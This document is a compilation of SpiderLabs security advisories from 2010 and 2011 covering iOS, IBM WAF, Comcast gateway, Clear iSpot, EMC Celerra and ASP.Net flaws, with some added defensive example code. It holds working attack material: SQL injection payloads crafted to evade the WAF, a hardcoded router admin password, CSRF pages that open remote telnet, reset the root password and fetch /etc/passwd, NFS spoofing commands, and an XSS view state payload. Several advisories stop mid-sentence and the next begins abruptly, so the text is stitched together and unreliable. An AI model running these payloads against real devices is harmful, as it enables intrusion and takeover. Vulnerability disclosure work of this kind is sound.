iOS's SSL certificate parsing contains a flaw where it fails to check the basicConstraints parameter of certificates in the chain. By signing a new certificate using a legitimate end entity certificate, an attacker can obtain a valid certificate for any domain. For example:

-TrustedCA
--somedomain.com (legitimate certificate)
---api.someotherdomain.com (signed by somedomain.com)

Using this technique any SSL traffic using the api.someotherdomain.com certificate can be intercepted and decrypted by the issuer. No notification of the invalid nature of the certificate is presented to the iOS user. This method allows for transparent man-in-the-middle attacks against encrypted iOS communications.

Remediation Steps:
Users should update to the latest version of iOS in order to address this issue. This vulnerability has been corrected in versions 5.0b4, 4.3.5, and 4.2.10.

Revision History:
07/15/11 - Vulnerability Disclosed
07/25/11 - Patch Released
07/25/11 - Advisory Published

References:
1. http://support.apple.com/kb/HT4824
2. http://support.apple.com/kb/HT4825
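TWSL2011-014 (Pantech) and TWSL2011-007 (iOS) describe the same path-validation omission: the verifier follows issuer links to a trusted root but never asks whether each issuer is entitled to issue, which is what the basicConstraints cA flag encodes. The Python block below is an added example, not Apple's or Pantech's code and not a real X.509 parser: it models only the fields that matter for path building (signature checks are assumed to have passed for every link), puts the flawed walk beside the correct one, and goes one step beyond the advisory's case by also enforcing pathLenConstraint. The certificate names follow the advisory's example; the intermediate and rogue sub-CA records are constructed.

```python
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Cert:
    """Minimal model of the X.509 fields relevant to path building.
    Signature verification is assumed done; this decides whether the path is allowed."""
    subject: str
    issuer: str
    ca: bool = False                 # basicConstraints cA
    path_len: Optional[int] = None   # basicConstraints pathLenConstraint (CA certs only)


class ChainError(Exception):
    pass


def _check_links(chain: List[Cert]):
    """Each certificate must be issued by the next one in the list (leaf first, root last)."""
    for child, parent in zip(chain, chain[1:]):
        if child.issuer != parent.subject:
            raise ChainError(f"{child.subject} not issued by {parent.subject}")


def validate_chain_flawed(chain: List[Cert], trusted_roots: List[str]) -> bool:
    """The behaviour the advisories describe: issuer linkage up to a trusted root,
    with no check that the issuing certificate is a CA."""
    _check_links(chain)
    return chain[-1].subject in trusted_roots


def validate_chain(chain: List[Cert], trusted_roots: List[str]) -> bool:
    """Correct rule: every certificate that signs another in the path carries cA=TRUE,
    and a CA's pathLenConstraint bounds how many CA certificates may sit below it."""
    _check_links(chain)
    for child, parent in zip(chain, chain[1:]):
        if not parent.ca:
            raise ChainError(f"{parent.subject} is an end-entity certificate and cannot sign {child.subject}")
    for idx, cert in enumerate(chain[1:], start=1):
        if cert.ca and cert.path_len is not None:
            # CA certificates strictly between the leaf and this CA (the leaf itself is excluded).
            intermediates_below = sum(1 for c in chain[1:idx] if c.ca)
            if intermediates_below > cert.path_len:
                raise ChainError(f"{cert.subject} pathLenConstraint={cert.path_len} exceeded")
    return chain[-1].subject in trusted_roots


def accepted(validator, chain: List[Cert], roots=("TrustedCA",)) -> bool:
    """Convenience wrapper: True if the validator accepts the chain, False if it rejects."""
    try:
        return validator(chain, list(roots))
    except ChainError:
        return False


# The advisory's example, plus constructed records for the pathLen case.
ROOT = Cert("TrustedCA", "TrustedCA", ca=True)
LEGIT_LEAF = Cert("somedomain.com", "TrustedCA")                       # legitimate end-entity cert
FORGED_LEAF = Cert("api.someotherdomain.com", "somedomain.com")        # signed by the end-entity cert
INTERMEDIATE = Cert("Intermediate CA", "TrustedCA", ca=True, path_len=0)   # constructed
SERVER = Cert("api.someotherdomain.com", "Intermediate CA")            # constructed, properly issued
ROGUE_SUB_CA = Cert("Rogue Sub CA", "Intermediate CA", ca=True)        # constructed, violates pathLen=0
DEEP_SERVER = Cert("deep.example.test", "Rogue Sub CA")                # constructed
```

The flawed validator accepts [FORGED_LEAF, LEGIT_LEAF, ROOT] because every issuer name lines up; the correct one rejects it at the first link, since somedomain.com is not a CA. The pathLen check catches the second failure mode a verifier must handle: a genuine CA that was only licensed to issue end-entity certificates being used to mint another CA.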
TWSL2011-006: IBM Web Application Firewall Bypass
Trustwave's SpiderLabs Security Advisory TWSL2011-006: IBM Web Application Firewall Bypass https://www.trustwave.com/spiderlabs/advisories/TWSL2011-006.txt Published: 2011-06-21 Version: 1.0 Vendor: IBM Product: IBM Web Application Firewall These capabilities are included through SiteProtector 7.0 and later software within IBM Security Network IPS GX products, IBM Security Server Protection products, and IBM Security Multi-Function product lines during 2H of 2009. Versions affected: Tested against G400 IPS-G400-IB-1 (Intrusion Prevention Update: 2011-03-11 00:34:23 - version: 31.030) and GX4004 IPS-GX4004-IB-2 (Intrusion Prevention Update: 2011-03-10 23:49:15 - version: 31.030). Product description: IBM Web Application Firewall capabilities inside IBM IPS products complement IBM Security's portfolio of web application security offerings to deliver end-to-end Web application security solutions. Credit: Wendel Guglielmetti Henrique of Trustwave's SpiderLabs Finding: IBM Web Application Firewall Bypass The IBM Web Application Firewall can be evaded, allowing an attacker to exploit web vulnerabilities that the product intends to protect. The issue occurs when an attacker submits repeated occurrences of the same parameter. The example shown below uses the following environment: A web environment using Microsoft IIS, ASP .NET technology, Microsoft SQL Server 2000, being protected by the IBM Web Application Firewall. As expected, the following request will be identified and blocked (depending of configuration) by the IBM Web application firewall. http://sitename/find_ta_def.aspx?id=2571iid='; EXEC master..xp_cmdshell ping 10.1.1.3 -- IIS with ASP.NET (and even pure ASP) technology will concatenate the contents of a parameter if multiple entries are part of the request. 
http://sitename/find_ta_def.aspx?id=2571iid='; EXEC master..xp_cmdshell iid= ping 10.1.1.3 -- IIS with ASP.NET (and even pure ASP) technology will concatenate both entries of iid parameter, however it will include an comma , between them, resulting in the following output being sent to the database. '; EXEC master..xp_cmdshell , ping 10.1.1.3 -- The request above will be identified and blocked (depending of configuration) by IBM Web application firewall, because it appears that EXEC and xp_cmdshell trigger an attack pattern. However, it is possible to split all the spaces in multiple parameters. For example: http://sitename/find_ta_def.aspx?id=2571iid='; iid= EXEC iid= master..xp_cmdshell iid= ping 10.1.1.3 iid= -- The above request will bypass the affected IBM Web application firewall, resulting in the following output being sent to the database. '; , EXEC , master..xp_cmdshell , ping 10.1.1.3 , -- However, the above SQL code will not be properly executed because of the comma inserted on the SQL query, to solve this situation we will use SQL comments. http://sitename/find_ta_def.aspx?id=2571iid='; /*iid=1*/ EXEC /*iid=1*/ master..xp_cmdshell /*iid=1*/ ping 10.1.1.3 /*iid=1*/ -- The above request will bypass IBM Web application firewall, resulting in the following output being sent to the database, which is a valid and working SQL code. '; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ ping 10.1.1.3 /*,1*/ -- The above code will execute the ping command on the Microsoft Windows backend, assuming the application was running with administrative privileges. This attack class is also referenced sometimes as HTTP Pollution Attack, HTTP Parameter Pollution (HPP) and HTTP Parameter Concatenation. The exploitability of this issue depends of the infrastructure (WebServer, Development Framework Technology, etc) technology being used. Remediation Steps: IBM has released fixes to the above issue in the Super Tuesday patch released in June. 
Refer to the references section of this advisory for further information released by IBM.

Revision History:
04/07/11 - Vulnerability disclosed
06/16/11 - Patch released
06/21/11 - Advisory published

References:
1. http://www.iss.net/security_center/reference/vuln/HTTP_Parameter_Abuse.htm
2. http://xforce.iss.net/xforce/xfdb/67178

About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations, ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers, manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and
TWSL2011-002: Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways (SMCD3G-CCR)
Trustwave's SpiderLabs Security Advisory TWSL2011-002: Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways (SMCD3G-CCR)
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt

Published: 2011-02-04
Version: 1.0

Vendor: Comcast (http://comcast.com) and SMC (http://www.smc.com)
Product: Comcast DOCSIS 3.0 Business Gateway - SMCD3G-CCR
Version affected: Versions prior to 1.4.0.49.2

Product description:
The Comcast DOCSIS 3.0 Business Gateway provides end-user termination of cable internet services for Comcast Business Class customers, with enhanced services including Network Address Translation (NAT), firewalling, and Virtual Private Network (VPN) termination.

Credit: Zack Fasel and Matthew Jakubowski of Trustwave's SpiderLabs

Finding 1: Static Credentials
CVE: CVE-2011-0885

All SMCD3G-CCR gateways provided by Comcast have an administrative login of mso with the password D0nt4g3tme. These credentials are not provided to the customer as part of the installation of the device, and customers are not advised to change them, so the majority of users are unaware of this default configuration. With these default credentials, attackers on the internal network can modify the device configuration to leverage more significant attacks, including redirection of DNS requests, creation of a remote VPN termination point, and modification of NAT entries. The credentials provide access to the web management interface as well as to a telnet interface that provides shell access to the device. The mso login provides a shell as UID 0 (root).

Finding 2: Cross Site Request Forgery (CSRF)
CVE: CVE-2011-0886

SMCD3G-CCR gateways provided by Comcast permit CSRF attacks against numerous management pages, allowing an attacker to embed in a web page a malicious request against the gateway's management interface. Through this, an attacker can modify the device configuration and enable remote administration via a telnet shell and HTTP.
The following Proof of Concept (PoC) connects to the gateway, logs in with the static credentials from Finding 1, modifies the remote administration settings so that any host can connect externally, and modifies the DNS information. The management pages accept these POSTs without any anti-CSRF token, which is what makes the attack possible.

## smcd3g-csrf-poc.htm
<html>
<body>
<iframe src="./smcd3g-csrf-poc-1.htm" width="1" height="1"></iframe>
<iframe src="./smcd3g-csrf-poc-2.htm" width="1" height="1"></iframe>
<iframe src="./smcd3g-csrf-poc-3.htm" width="1" height="1"></iframe>
</body>
</html>

## smcd3g-csrf-poc-1.htm
<!-- Logs in with the static mso credentials (Finding 1) -->
<html>
<body>
<form action="http://10.1.10.1/goform/login" method="post" name="tF">
<input type="hidden" name="user" value="mso" />
<input type="hidden" name="pws" value="D0nt4g3tme" />
</form>
<script>document.tF.submit();</script>
</body>
</html>

## smcd3g-csrf-poc-2.htm
<!-- Enables remote HTTP, HTTPS and telnet administration from any address -->
<html>
<body>
<form action="http://10.1.10.1/goform/RemoteRange" name="RMangement" method="post">
<input type="hidden" name="file" value="feat-admin-remote" />
<input type="hidden" name="dir" value="admin/" />
<input type="hidden" name="RemoteRange" value="0" />
<input type="hidden" name="rm_access" value="on" />
<input type="hidden" name="Remote0" value="0.0.0.0,0.0.0.0,1" />
<input type="hidden" name="http_port" value="8080" />
<input type="hidden" name="http_enable" value="on" />
<input type="hidden" name="http_flag" value="1" />
<input type="hidden" name="msoremote_enableCheck" value="on" />
<input type="hidden" name="mso_remote_enable" value="1" />
<input type="hidden" name="remote_enable" value="0" />
<input type="hidden" name="https_enable" value="on" />
<input type="hidden" name="https_port" value="8181" />
<input type="hidden" name="https_flag" value="1" />
<input type="hidden" name="telnet_enable" value="on" />
<input type="hidden" name="telnet_port" value="2323" />
<input type="hidden" name="telnet_flag" value="1" />
<input type="hidden" name="Remote1" value="" />
</form>
<!-- Delay the submit so the login request from poc-1 completes first -->
<script>setTimeout(function () { document.RMangement.submit(); }, 4000);</script>
</body>
</html>

## smcd3g-csrf-poc-3.htm
<!-- Sets fixed DNS servers of the attacker's choosing (4.2.2.1 / 4.2.2.2 here) -->
<html>
<body>
<form name="WanIPform" action="http://10.1.10.1/goform/Basic" method="post">
<input type="hidden" name="file" value="feat-wan-ip" />
<input type="hidden" name="dir" value="admin/" />
<input type="hidden" name="DNSAssign" value="Fixed" />
<input type="hidden" name="dhcpc_release" value="0" />
<input type="hidden" name="dhcpc_renew" value="0" />
<input type="hidden" name="domain_name" value="" />
<input type="hidden" name="WDn" value="" />
<input type="hidden" name="SysName" value="" />
<input type="hidden" name="manual_dns_enable" value="on" />
<input type="hidden" name="DAddr" value="4.2.2.1" />
<input type="hidden" name="DAddr0" value="4" />
<input type="hidden" name="DAddr1" value="2" />
<input type="hidden" name="DAddr2" value="2" />
<input type="hidden" name="DAddr3" value="1" />
<input type="hidden" name="PDAddr" value="4.2.2.2" />
<input type="hidden" name="PDAddr0" value="4" />
<input type="hidden" name="PDAddr1" value="2" />
<input type="hidden" name="PDAddr2" value="2" />
<input type="hidden" name="PDAddr3" value="2" />
</form>
<!-- Submitted last, after the remote-administration change above -->
<script>setTimeout(function () { document.WanIPform.submit(); }, 5000);</script>
</body>
</html>

If the PoC is embedded in any web page the targeted user visits while logged into the device, the attacker is granted remote administration of the gateway, including a telnet shell. This would allow the attacker to redirect traffic to a malicious endpoint.

Finding 3: Weak Session Management
CVE: CVE-2011-0887

SMCD3G-CCR gateways provided by Comcast utilize a
TWSL2010-008: Clear iSpot/Clearspot CSRF Vulnerabilities
Trustwave's SpiderLabs Security Advisory TWSL2010-008: Clear iSpot/Clearspot CSRF Vulnerabilities
https://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt

Published: 2010-12-10
Version: 1.0

Vendor: Clear (http://www.clear.com/)
Products: iSpot / ClearSpot 4G (http://www.clear.com/devices)

Versions affected: The observed behavior is the result of a design choice, and may be present on multiple versions. The specific versions used during testing are given below.

iSpot version: 2.0.0.0 [R1679 (Jul 6 2010 17:57:37)]
Clearspot versions: 2.0.0.0 [R1512 (May 31 2010 18:57:09)], 2.0.0.0 [R1786 (Aug 4 2010 20:09:06)]
Firmware Version: 1.9.9.4
Hardware Version: R051.2
Device Name: IMW-C615W
Device Manufacturer: INFOMARK (http://infomark.co.kr/)

Product Description:
iSpot and ClearSpot 4G are portable 4G devices that allow users to share and broadcast their own personal WiFi network. The device connects up to 8 clients at the same time on the same 4G connection.

Credit: Matthew Jakubowski of Trustwave's SpiderLabs
CVE: CVE-2010-4507

Finding:
These devices are susceptible to Cross-Site Request Forgery (CSRF). An attacker who is able to coerce a ClearSpot / iSpot user into following a link can execute arbitrary system commands on the device: the management interface's webmain.cgi runs the contents of its cmd parameter, and none of its actions carry any anti-CSRF protection.

The following examples allow an attacker to enable remote access to the iSpot and ClearSpot 4G and to add their own account to the device. This level of access also provides the device's client-side SSL certificates, which are used to perform device authentication. This could lead to a compromise of ClearWire accounts as well as other personal information.
Add new user:

    <form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi">
    <input type="hidden" name="act" value="act_cmd_result">
    <input type="hidden" name="cmd" value="adduser -S jaku">
    <input type="submit">
    </form>

or

    <img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_cmd_result&cmd=adduser%20-S%20jaku'>

Remove root password:

    <form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi">
    <input type="hidden" name="act" value="act_cmd_result">
    <input type="hidden" name="cmd" value="passwd -d root">
    <input type="submit">
    </form>

or

    <img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_cmd_result&cmd=passwd%20-d%20root'>

Enable remote administration access:

    <form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi">
    <input type="hidden" name="act" value="act_network_set">
    <input type="hidden" name="enable_remote_access" value="YES">
    <input type="hidden" name="remote_access_port" value="80">
    <input type="submit">
    </form>

or

    <img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_network_set&enable_remote_access=YES&remote_access_port=80'>

Enable telnet if not already enabled:

    <form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi">
    <input type="hidden" name="act" value="act_set_wimax_etc_config">
    <input type="hidden" name="ENABLE_TELNET" value="YES">
    <input type="submit">
    </form>

or

    <img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_set_wimax_etc_config&ENABLE_TELNET=YES'>

Allow remote telnet access:

    <form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi">
    <input type="hidden" name="act" value="act_network_set">
    <input type="hidden" name="add_enable" value="YES">
    <input type="hidden" name="add_host_ip" value="1">
    <input type="hidden" name="add_port" value="23">
    <input type="hidden" name="add_protocol" value="BOTH">
    <input type="hidden" name="add_memo" value="admintelnet">
    <input type="submit">
    </form>

or

    <img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_network_set&add_enable=YES&add_host_ip=1&add_port=23&add_protocol=both&add_memo=admintelnet'>

Once compromised, it is possible to download any file from the device using the following method.

Download /etc/passwd file:

    <form method="post" action="http://192.168.1.1/cgi-bin/upgrademain.cgi">
    <input type="hidden" name="act" value="act_file_download">
    <input type="hidden" name="METHOD" value="PATH">
    <input type="hidden" name="FILE_PATH" value="/etc/passwd">
    <input type="submit">
    </form>

or

    <img src='http://192.168.1.1/cgi-bin/upgrademain.cgi?act=act_file_download&METHOD=PATH&FILE_PATH=/etc/passwd'>

Vendor Response:
No official response is available at the time of release.

Remediation Steps:
No patch currently exists for this issue. To limit exposure, network access to these devices should be restricted to authorized personnel through the use of Access Control Lists and proper network segmentation.

Vendor Communication Timeline:
8/26/10 - Vendor contact initiated.
9/30/10 - Vulnerability details provided to vendor.
12/3/10 - Notified vendor of release date. No workaround or patch provided.
12/10/10 - Advisory published.

Revision History:
1.0 Initial publication
TWSL2010-003: Unauthorized access to root NFS export on EMC Celerra NAS appliance
Trustwave's SpiderLabs Security Advisory TWSL2010-003: Unauthorized access to root NFS export on EMC Celerra Network Attached Storage (NAS) appliance
https://www.trustwave.com/spiderlabs/advisories/TWSL2010-003.txt

Published: 2010-07-29
Version: 1.0

Vendor: EMC (http://www.emc.com)
Product: Celerra Unified Storage products (http://www.emc.com/products/family/celerra-family.htm)
Version(s) affected: All

Product Description:
The Celerra Unified Storage Platform provides Network Attached Storage (NAS) services through a combination of server appliances and software modules.

Credit: Steve Ocepek of Trustwave's SpiderLabs
CVE: CVE-2010-2860

Finding:
The Celerra appliance's NFS server freely exports its / file system and enforces access using a factory-defined list of authorized IP addresses. The addresses found on a recent model are listed in the showmount example below; the list may differ depending on product version. The IP addresses are intended for communication internal to the appliance, but are still accepted when they arrive from external sources. An attacker can therefore mount this file system by spoofing an authorized IP address.

The NFS showmount command can be used to obtain the list of IP addresses:

    # showmount -e <Celerra IP address>
    Export list for <Celerra IP address>:
    / 128.221.253.101,128.221.252.101,128.221.253.100,128.221.252.100

Because the appliance's NFS server does not enable root squashing (root_squash), full access to the file system is possible by mounting the export as root (UID 0).

Fully spoofing the source IP address (for sending and receiving packets) will usually require access to the local subnet or the ability to exploit some other network infrastructure vulnerability. On Linux, local IP address spoofing can be accomplished by creating an alias interface and using the ip route command to set the source IP accordingly:

    # ifconfig eth0:0 128.221.253.101
    # ip route add <Celerra IP address> dev eth0 src 128.221.253.101
    # mkdir nfs
    # mount <Celerra IP address>:/ nfs

The flaw allows unauthorized access to files contained on the system, including all CIFS shares and iSCSI mounted drives. The / path does not correspond to the true root of the file system; only the root of the user data directory is exposed.

Vendor Response:
The vendor has acknowledged this issue and issued the following workaround. The vendor has also published a knowledgebase article about the issue and its mitigation so that support can help any customers who call in with this issue until a permanent fix from EMC is available. The vendor's estimated date for a code fix is Q3 2010.

Remediation Steps:
The following recommendations were provided by the vendor.

1. Hide NFS exports and show them only based on the configured access. Setting the forceFullShowmount parameter to 0 (default is 1) will hide / from the list, since only the Control Station has access to it, for administration purposes:

    [r...@virgil slot_3]# server_param server_3 -f mount -info forceFullShowmount
    server_3 :
    name             = forceFullShowmount
    facility_name    = mount
    default_value    = 1
    current_value    = 1
    configured_value =
    user_action      = none
    change_effective = immediate
    range            = (0,1)
    description      = Forces response to showmount requests to fully populate response.

    [r...@virgil slot_3]# server_param server_3 -f mount -modify forceFullShowmount -value 0
    server_3 : done

After the above change, a client will see only the shares it has permission to access:

    /usr/sbin/showmount -e 172.24.97.3
    Export list for 172.24.97.3:
    /fs1 (everyone)

2. Change the default IP addresses (during install or afterwards) for the internal network, along with the first step above, to further minimize exploitability.

The product team has provided additional mitigation steps that customers can implement to reduce the severity of exploitation of this vulnerability:

1. Create IP-based access rules on the network equipment rejecting traffic for IP addresses belonging to the internal Celerra network, which has its own switch for that purpose. These addresses are listed in the /etc/hosts file of the Celerra Control Station.
2. Configure firewall(s) between Data Movers and NFS clients to reject traffic for IP addresses belonging to the internal Celerra network.
3. Hide NFS exports and show them only based on the configured access. Setting the forceFullShowmount parameter to 0 (default is 1) will hide "/" from the list, since only the Control Station has access to it for administration purposes.
4. Disable IP reflect.

Vendor Communication Timeline:
05/07/10 - Initial communication
05/10/10 - Vulnerability details provided
05/18/10 - Vulnerability acknowledged, workaround and timeline provided
07/27/10 - Additional workaround details provided

Revision History:
1.0 Initial publication
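The showmount check from the finding above can be turned into a repeatable audit. The following shell function is an added example, not from the advisory or from EMC: it reads the output of "showmount -e <host>" on standard input, reports whether the root export is advertised, and counts how many of its authorised clients fall in the 128.221.252.x / 128.221.253.x ranges the advisory identifies as Celerra-internal. The two sample outputs are constructed to match the before- and after-fix listings quoted above.

```sh
#!/bin/sh
# Added example (not from the advisory or EMC). Reads `showmount -e <host>`
# output on stdin. Prints one line per export; returns 1 when the root
# export "/" is advertised (the vulnerable configuration), 0 otherwise.
check_root_export() {
    awk '
        NR == 1 { next }                        # "Export list for <host>:" header
        $1 == "/" {
            n = split($2, clients, ",")         # client list is comma-separated
            internal = 0
            for (i = 1; i <= n; i++)
                if (clients[i] ~ /^128\.221\.25[23]\./) internal++
            printf "root export advertised to %d client(s), %d in the Celerra-internal range\n", n, internal
            found = 1
            next
        }
        { print "export " $1 " -> " $2 }
        END { exit (found ? 1 : 0) }
    '
}

# Usage against a live appliance:  showmount -e 172.24.97.3 | check_root_export

# Constructed sample: the vulnerable listing quoted in the advisory.
sample_before_fix() {
    printf 'Export list for 172.24.97.3:\n/ 128.221.253.101,128.221.252.101,128.221.253.100,128.221.252.100\n/fs1 (everyone)\n'
}

# Constructed sample: the listing after forceFullShowmount is set to 0.
sample_after_fix() {
    printf 'Export list for 172.24.97.3:\n/fs1 (everyone)\n'
}
```

Note that hiding the export from showmount (the vendor's first recommendation) only removes it from the listing; the mount itself still relies on source-address filtering, which is why the network-level rules in the additional mitigation steps matter as well.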
Trustwave's SpiderLabs Security Advisory TWSL2010-001
Trustwave's SpiderLabs Security Advisory TWSL2010-001: Multiplatform View State Tampering Vulnerabilities

Published: 2010-02-08
Version: 1.1

SpiderLabs has documented view state tampering vulnerabilities in three products from separate vendors. View states are used by some web application frameworks to store the state of HTML GUI controls. View states are typically stored in hidden client-side input fields, although server-side storage is widely supported. The affected vendors generally recommend that client-side view states be cryptographically signed and/or encrypted, but specific exploits have not previously been documented. These vulnerabilities show that unsigned client-side view states will ALWAYS result in a vulnerability in the affected products.

Credit: David Byrne of Trustwave's SpiderLabs

===
Vendor: Microsoft (http://www.microsoft.com)
Product: ASP.Net (http://www.asp.net)
Versions affected: .Net 3.5 is confirmed vulnerable; previous versions are likely to be vulnerable as well.

Description:
ASP.Net is a web-application development framework that provides for both user interfaces and back-end functionality. The ASP.Net view state is typically stored in a hidden field named __VIEWSTATE. When a page's view state is not cryptographically signed, many standard .Net controls are vulnerable to Cross-Site Scripting (XSS) through the view state.

It is well documented that using an unsigned view state is bad, but most previous advisories focus on vaguely described threats or on vulnerabilities introduced by custom use of the view state. To the best of Trustwave's knowledge, this is the first time a proof of concept attack of this nature has been demonstrated against the view state. A vulnerability was alluded to in a 2004 Microsoft article on troubleshooting view state problems [1]. However, other Microsoft documents recommend disabling view state signing if performance is a key consideration [2, 3, 4] or for various other reasons [5, 6].
Realistically, unsigned view states should never be used in a production environment.

The following page is vulnerable to an XSS attack against the form control. Note that the ValidateRequest setting does not prevent the attack: the injected markup is base64-encoded inside __VIEWSTATE and only appears after deserialization, so request validation never sees it.

    <%@ Page EnableViewStateMac="False" ValidateRequest="True" %>
    <html runat="server">
    <form runat="server"/>
    </html>

If the following request is sent to the server, the response will contain JavaScript that calls an alert box:

    xss.aspx?__VIEWSTATE=/wEPDwUKLTgzNDA2NzgyMA9kFgJmD2QWAgIBDxYCHglpbm5lcmh0bWwFHTxzY3JpcHQ%2BYWxlcnQoJ3hzcycpPC9zY3JpcHQ%2BZGQ=

The view state's XML equivalent is below:

    <?xml version="1.0" encoding="utf-16"?>
    <viewstate>
      <Pair>
        <Pair>
          <String>-834067820</String>
          <Pair>
            <ArrayList>
              <Int32>0</Int32>
              <Pair>
                <ArrayList>
                  <Int32>1</Int32>
                  <Pair>
                    <ArrayList>
                      <IndexedString>innerhtml</IndexedString>
                      <String>&lt;script&gt;alert('xss')&lt;/script&gt;</String>
                    </ArrayList>
                  </Pair>
                </ArrayList>
              </Pair>
            </ArrayList>
          </Pair>
        </Pair>
      </Pair>
    </viewstate>

The HTML response is below:

    <html>
    <form name="ctl01" method="post" action="xss.aspx" id="ctl01">
    <div>
    <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTgzNDA2NzgyMA9kFgJmD2QWAgIBDxYCHglpbm5lcmh0bWwFHTxzY3JpcHQ+YWxlcnQoJ3hzcycpPC9zY3JpcHQ+ZGQ=" />
    </div>
    <script>alert('xss')</script></form>
    </html>

This example uses the innerhtml attribute of the form control, although other attributes in other controls are also vulnerable to similar attacks.

Remediation Steps:
The ASP.Net view state should always be cryptographically signed with a Message Authentication Code (MAC). This has been enabled by default since .Net 1.1, but can be disabled using the EnableViewStateMac setting. Using the ViewStateUserKey setting can also help to limit the scope of this vulnerability. [7]

===
Vendor: Apache Software Foundation (http://www.apache.org)
Product: Apache MyFaces (http://myfaces.apache.org/)
Versions affected: 1.2.8 and 1.1.7 are confirmed as vulnerable. All previous versions are likely vulnerable.
Related products: Some versions of IBM WebSphere Application Server (at least 6.x and 7.x) ship with Apache MyFaces [8, 9].

Description:
MyFaces is an open source implementation of the JavaServer Faces standard. JavaServer Faces [10] is a framework that aids in developing user interfaces for web-based applications. When the application's view state is not encrypted, it is possible for an attacker to supply a new or modified view object as part of a request. The malicious view can contain arbitrary HTML code (allowing Cross-Site Scripting) and arbitrary Expression Language (EL) [11] statements that will be executed on the server. The EL statements can be used to read data stored
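Returning to the ASP.Net finding above: the XML rendering of the view state is produced by decoding the binary format of System.Web.UI.ObjectStateFormatter, the "LOS" format behind every __VIEWSTATE field. The decoder below is an added example, not code from the advisory or from Microsoft. It implements the token subset the advisory's payload uses (Pair, ArrayList, String, IndexedString, small integers and the null/empty/true/false markers), decodes the exact __VIEWSTATE value quoted above to show the injected innerhtml string, and applies a heuristic MAC check: with EnableViewStateMac the HMAC (20 bytes for SHA1, 32 for SHA256) is appended after the serialised tree, so a fully consumed blob with no trailing bytes is unsigned. The with_fake_mac helper and its key are constructed for the demonstration and do not reproduce ASP.Net's keyed MAC.

```python
"""Decoder for the ASP.Net __VIEWSTATE binary ("LOS") format written by
System.Web.UI.ObjectStateFormatter, covering the token subset used by the
advisory's payload. Added example, not code from the advisory or Microsoft.
Token values are ObjectStateFormatter's. The MAC check is a heuristic:
without EnableViewStateMac the serialised tree consumes the whole blob,
with it an HMAC (20 bytes SHA1 / 32 bytes SHA256) trails the tree.
"""
import base64
import hashlib
import hmac

T_INT16, T_INT32, T_BYTE, T_STRING = 0x01, 0x02, 0x03, 0x05
T_PAIR, T_TRIPLET, T_ARRAYLIST = 0x0F, 0x10, 0x16
T_ISTR_ADD, T_ISTR = 0x1E, 0x1F                      # IndexedString add / reference
T_NULL, T_EMPTYSTR, T_ZERO, T_TRUE, T_FALSE = 0x64, 0x65, 0x66, 0x67, 0x68

# The __VIEWSTATE from the advisory's request, as it appears in the HTML response.
ADVISORY_VIEWSTATE = (
    "/wEPDwUKLTgzNDA2NzgyMA9kFgJmD2QWAgIBDxYCHglpbm5lcmh0bWwFHTxzY3JpcHQ+"
    "YWxlcnQoJ3hzcycpPC9zY3JpcHQ+ZGQ="
)


class LosReader:
    def __init__(self, data, pos=0):
        self.data, self.pos, self.table = data, pos, []

    def byte(self):
        self.pos += 1
        return self.data[self.pos - 1]

    def varint(self):
        """BinaryWriter.Write7BitEncodedInt: 7 bits per byte, low bits first."""
        result = shift = 0
        while True:
            b = self.byte()
            result |= (b & 0x7F) << shift
            if not b & 0x80:
                return result
            shift += 7

    def string(self):
        n = self.varint()                                # UTF-8 byte-length prefix
        s = self.data[self.pos:self.pos + n].decode("utf-8")
        self.pos += n
        return s

    def value(self):
        t = self.byte()
        simple = {T_NULL: None, T_EMPTYSTR: "", T_ZERO: 0, T_TRUE: True, T_FALSE: False}
        if t in simple:
            return simple[t]
        if t == T_BYTE:
            return self.byte()
        if t == T_INT16:
            self.pos += 2
            return int.from_bytes(self.data[self.pos - 2:self.pos], "little", signed=True)
        if t == T_INT32:                                 # written as an unsigned 7-bit int
            v = self.varint() & 0xFFFFFFFF
            return v - (1 << 32) if v & 0x80000000 else v
        if t == T_STRING:
            return self.string()
        if t == T_ISTR_ADD:                              # string that also joins the table
            self.table.append(self.string())
            return self.table[-1]
        if t == T_ISTR:
            return self.table[self.byte()]
        if t == T_PAIR:
            return ("Pair", self.value(), self.value())
        if t == T_TRIPLET:
            return ("Triplet", self.value(), self.value(), self.value())
        if t == T_ARRAYLIST:
            return [self.value() for _ in range(self.varint())]
        raise ValueError("unsupported LOS token 0x%02x at offset %d" % (t, self.pos - 1))


def decode_viewstate(b64):
    """Return (tree, trailing_byte_count); raises if the FF 01 header is missing."""
    data = base64.b64decode(b64)
    if data[:2] != b"\xff\x01":
        raise ValueError("not an ObjectStateFormatter blob")
    r = LosReader(data, 2)
    return r.value(), len(data) - r.pos


def strings_in(tree):
    """Every string in a decoded tree, in order: where injected markup shows up."""
    if isinstance(tree, str):
        return [tree]
    if isinstance(tree, tuple):                          # drop the "Pair"/"Triplet" tag
        tree = tree[1:]
    if isinstance(tree, (list, tuple)):
        return [s for child in tree for s in strings_in(child)]
    return []


def looks_signed(b64):
    """Heuristic: a MAC'd view state leaves exactly one HMAC length unparsed."""
    return decode_viewstate(b64)[1] in (20, 32)


def with_fake_mac(b64, key=b"constructed-demo-key"):
    """Append an HMAC-SHA1 so the heuristic can be exercised offline. Only an
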